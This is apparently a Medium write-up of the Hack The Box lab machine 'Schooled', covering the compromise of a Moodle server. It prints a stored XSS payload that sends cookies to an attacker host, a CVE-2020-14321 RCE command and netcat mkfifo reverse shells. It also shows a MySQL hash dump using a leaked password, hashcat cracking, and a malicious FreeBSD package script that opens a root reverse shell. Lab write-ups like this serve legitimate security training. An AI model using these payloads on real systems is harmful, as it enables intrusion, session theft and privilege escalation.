Schooled HTB

namp Scan:

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214;
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD)
Service Info: OS: FreeBSD;

port 80 serves a web service, which says All content will be delivered over Moodle.

enumerating its subdomain

gobuster dns -d erev0s.com -w su 0 -i

Lets get it :)
So Lets enumerate more…

Once we enroll the courses we can see some instructions.

MoodleNet profiles to be set hmm…
lets check some exploits for moodle

Ah we got some xss, lets check that out

Stored XSS Works as intended.

So as the maths teacher said he will be checking the profile id, so using stored xss we can steal cookies and login as that teacher.
XSS Payload

<img src='x' onerror='fetch("http://[IP]/?data=" + btoa(document.cookie));'>sudo python3 -m http.server <port>

So replacing my cookie with teachers cookie, we can take over the teachers

Hmm.. there is a RCE vulnerability

CVE-2020–14321

Using this Vulnerability, we were able to do RCE, to get a shell we will be using webwrap.

python3 webwrap.py http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php?cmd=WRAP

and netcat to get a proper stable shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port>>/tmp/f

Enumerating we can see that there are two users

We don’t have access though, enumerating, we can see moodle uses mysql, so find config.php of model revels the mysql username and password
config.php

/usr/local/www/apache24/data/moodle

Locating mysql, /usr/local/bin

./mysql -u moodle -pPlaybookMaster2020 -D moodle -e 'SELECT username, password FROM mdl_user ORDER BY username;'

Gives admin username and password, cracking the password with hashcat

hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt

Login as admin we can see that

So he is one of the user which we found, SSH this user

Enumerating, we can see that we have sudo permission for package install,

#!/bin/bash
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo “Resetting root shell”
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.7 9080 >/tmp/a
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo “Registering root shell”
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: “1.0_5”
origin: sysutils/mypackage
comment: “automates stuff”
desc: “automates tasks which can also be undone later”
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .

mkdir /temp/package

Installing this package gives us the super user shell

--

--

--

Dev Dominus | Cyber security | Developer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

My Adventure Learning Software Programming.

Documenting Unity Lessons #Unity #GameDevHq #Day 1 #Stardate: -301760.4323630137

HOW-TO: Create a data copy pipeline in Azure Data Factory

Monitor System Performance with Monitorix on Alibaba Cloud

Cloud Computing : A Comparative Analysis between Amazon Web Services (AWS) and Microsoft Azure

Remove duplicate value from array

Azure Logic Apps: automating repetitive tasks to increase your productivity

🦖 JDI 1 month RECAP 🦖

EPS UE BEARERS AND CONNECTIVITY

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AGS

AGS

Dev Dominus | Cyber security | Developer

More from Medium

The recent passing of my 2 cats really made me jaded for the entire month of February…

Biodiversity on Earth

How will the public sale of $CROD take place?